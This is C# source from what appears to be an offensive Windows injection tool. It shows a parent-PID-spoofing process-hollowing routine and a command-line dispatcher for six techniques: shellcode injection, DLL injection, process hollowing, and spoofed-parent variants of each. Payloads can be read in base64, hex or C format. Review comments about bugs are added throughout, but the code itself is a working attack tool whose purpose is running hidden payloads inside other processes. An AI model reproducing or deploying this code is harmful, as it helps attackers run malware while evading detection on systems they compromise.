/// <summary>
/// Starts <paramref name="binary"/> through <c>ParentSpoofing</c> with <paramref name="parentpid"/>
/// as the parent, then hands the resulting process to <see cref="ProcHollowing"/>: a section is
/// created sized to the payload, the entry is located in the new process, the local section is
/// set to the same size, <paramref name="shellcode"/> is copied in, and the section is mapped
/// and started. Both handles from the returned PROCESS_INFORMATION are closed at the end.
/// </summary>
/// <param name="binary">Passed through to <c>ParentSpoofing</c>; presumably the image to launch — confirm against that method.</param>
/// <param name="shellcode">Payload bytes; <c>Length</c> is cast to <see cref="uint"/> for the section sizes.</param>
/// <param name="parentpid">Process id presented as the parent of the new process.</param>
/// <remarks>
/// The return values of both <c>CloseHandle</c> calls are ignored, so a failed close goes unreported.
/// Whether <see cref="ProcHollowing"/> releases the section handle it creates is not visible here.
/// </remarks>
public void PPidSpoof(string binary, byte[] shellcode, int parentpid)
{
    PROCESS_INFORMATION procInfo = ParentSpoofing(parentpid, binary);

    var hollower = new ProcHollowing();
    // Same size is used for the remote section and the local section.
    uint payloadSize = (uint)shellcode.Length;
    hollower.CreateSection(payloadSize);
    hollower.FindEntry(procInfo.hProcess);
    hollower.SetLocalSection(payloadSize);
    hollower.CopyShellcode(shellcode);
    hollower.MapAndStart(procInfo);

    // Release the thread and process handles handed back by ParentSpoofing.
    CloseHandle(procInfo.hThread);
    CloseHandle(procInfo.hProcess);
}
/// <summary>
/// Entry point. Parses <c>key:value</c> command-line tokens into a dictionary (Rubeus-style),
/// prints which account the process runs as, then dispatches on the <c>/t</c> value.
/// Every exception escaping the body is caught at the bottom and only its message is printed.
/// </summary>
/// <param name="args">Command-line tokens; each is split at its first ':' into key and value.</param>
static void Main(string[] args)
{
    try
    {
        logo();
        // https://github.com/GhostPack/Rubeus/blob/master/Rubeus/Domain/ArgumentParser.cs#L10
        var arguments = new Dictionary<string, string>();
        foreach (var argument in args)
        {
            // Split at the first ':' only, so a value may itself contain ':' (e.g. a drive path).
            var idx = argument.IndexOf(':');
            if (idx > 0)
            {
                arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1);
            }
            else
            {
                // A token without a value (or starting with ':') becomes a key with an empty value.
                arguments[argument] = string.Empty;
            }
        }

        WindowsIdentity identity = WindowsIdentity.GetCurrent();
        WindowsPrincipal principal = new WindowsPrincipal(identity);
        // NOTE(review): IsInRole tests Administrators membership in the current token; the
        // printed integrity label is derived from that, not read from the token's integrity level.
        if (principal.IsInRole(WindowsBuiltInRole.Administrator))
        {
            Console.WriteLine($"[+] Process running with {principal.Identity.Name} privileges with HIGH integrity.");
        }
        else
        {
            Console.WriteLine($"[+] Process running with {principal.Identity.Name} privileges with MEDIUM / LOW integrity.");
        }

        if (arguments.Count == 0)
        {
            Console.WriteLine("[+] No arguments specified. Please refer the help section for more details.");
            help();
        }
        else if (arguments.Count < 3)
        {
            Console.WriteLine("[+] Some arguments are missing. 
Please refer the help section for more details.");
            help();
        }
        else if (arguments.Count >= 3) // always true at this point; the branch above handled Count < 3
        {
            int procid = 0;
            if (arguments.ContainsKey("/pid"))
            {
                // Convert.ToInt32 throws FormatException on a non-numeric value; caught by the outer catch.
                procid = Convert.ToInt32(arguments["/pid"]);
                // The result is unused: this only checks that the pid resolves (GetProcessById
                // throws ArgumentException for an unknown pid, again surfacing via the outer catch).
                Process process = Process.GetProcessById(procid);
            }

            // Every arguments["..."] read below uses the indexer, which throws KeyNotFoundException
            // when the key is absent; such a missing /path, /t, /f, /ppath or /parentproc is only
            // reported as the exception message by the outer catch, not via help().
            if (System.IO.File.Exists(arguments["/path"]))
            {
                if (arguments["/t"] == "1")
                {
                    var shellcode = System.IO.File.ReadAllText(arguments["/path"]);
                    byte[] buf = new byte[] { };
                    // An unrecognised /f value leaves buf empty and the call below still proceeds with it.
                    if (arguments["/f"] == "base64")
                    {
                        buf = Convert.FromBase64String(shellcode);
                    }
                    else if (arguments["/f"] == "hex")
                    {
                        buf = StringToByteArray(shellcode);
                    }
                    else if (arguments["/f"] == "c")
                    {
                        buf = convertfromc(shellcode);
                    }
                    CodeInject(procid, buf);
                }
                else if (arguments["/t"] == "2")
                {
                    // Here /path is treated as a DLL path and passed as bytes.
                    // NOTE(review): Encoding.Default is code-page dependent on .NET Framework;
                    // this assumes the path is ASCII — confirm.
                    var dllpath = arguments["/path"];
                    byte[] buf = Encoding.Default.GetBytes(dllpath);
                    DLLInject(procid, buf);
                }
                else if (arguments["/t"] == "3")
                {
                    var shellcode = System.IO.File.ReadAllText(arguments["/path"]);
                    byte[] buf = new byte[] { };
                    // Same /f handling as /t == 1: unknown values leave buf empty.
                    if (arguments["/f"] == "base64")
                    {
                        buf = Convert.FromBase64String(shellcode);
                    }
                    else if (arguments["/f"] == "hex")
                    {
                        buf = StringToByteArray(shellcode);
                    }
                    else if (arguments["/f"] == "c")
                    {
                        buf = convertfromc(shellcode);
                    }
                    ProcHollowing prochollow = new ProcHollowing();
                    prochollow.Hollow(arguments["/ppath"], buf);
                }
                else if (arguments["/t"] == "4")
                {
                    Console.WriteLine($"[+] Parent Process Spoofing with Vanila Process Injection Technique.");
                    ParentPidSpoofing Parent = new ParentPidSpoofing();
                    string ppid = null;
                    int parentProc = 0;
                    // /parentproc is resolved to a pid by SearchForPPID (defined elsewhere).
                    ppid = Convert.ToString(arguments["/parentproc"]);
                    parentProc = Parent.SearchForPPID(ppid);
                    var shellcode = System.IO.File.ReadAllText(arguments["/path"]);
                    byte[] buf = new byte[] { };
                    if (arguments["/f"] == "base64")
                    {
                        buf = Convert.FromBase64String(shellcode);
                    }
                    else if (arguments["/f"] == "hex")
                    {
                        buf = StringToByteArray(shellcode);
                    }
                    else if (arguments["/f"] == "c")
                    {
                        buf = convertfromc(shellcode);
                    }
                    PPIDCodeInject(arguments["/ppath"], buf, parentProc);
                }
                else if (arguments["/t"] == "5")
                {
                    Console.WriteLine($"[+] 
Parent Process Spoofing with DLL Process Injection Technique.");
                    ParentPidSpoofing Parent = new ParentPidSpoofing();
                    string ppid = null;
                    int parentProc = 0;
                    ppid = Convert.ToString(arguments["/parentproc"]);
                    parentProc = Parent.SearchForPPID(ppid);
                    // As in /t == 2, /path is a DLL path encoded with Encoding.Default.
                    var dllpath = arguments["/path"];
                    byte[] buf = Encoding.Default.GetBytes(dllpath);
                    PPIDDLLInject(arguments["/ppath"], buf, parentProc);
                }
                else if (arguments["/t"] == "6")
                {
                    Console.WriteLine($"[+] Parent Process Spoofing with Process Hollowing Injection Technique.");
                    ParentPidSpoofing Parent = new ParentPidSpoofing();
                    string ppid = null;
                    int parentProc = 0;
                    ppid = Convert.ToString(arguments["/parentproc"]);
                    parentProc = Parent.SearchForPPID(ppid);
                    var shellcode = System.IO.File.ReadAllText(arguments["/path"]);
                    byte[] buf = new byte[] { };
                    if (arguments["/f"] == "base64")
                    {
                        buf = Convert.FromBase64String(shellcode);
                    }
                    else if (arguments["/f"] == "hex")
                    {
                        buf = StringToByteArray(shellcode);
                    }
                    else if (arguments["/f"] == "c")
                    {
                        buf = convertfromc(shellcode);
                    }
                    Parent.PPidSpoof(arguments["/ppath"], buf, parentProc);
                }
                // No else: an unknown /t value falls through silently and nothing is reported.
            }
            else
            {
                Console.WriteLine("[+] File doesn't exists. Please check the specified file path.");
            }
        }
        else
        {
            // Unreachable: Count is either 0, < 3, or >= 3 and all three are handled above.
            Console.WriteLine("[+] Invalid argument. Please refer the help section for more details.");
            help();
        }
    }
    catch (Exception ex)
    {
        // Catch-all: only the message is printed, so the exception type (KeyNotFoundException,
        // FormatException, ArgumentException, ...) is not distinguishable to the user.
        Console.WriteLine(ex.Message);
    }
}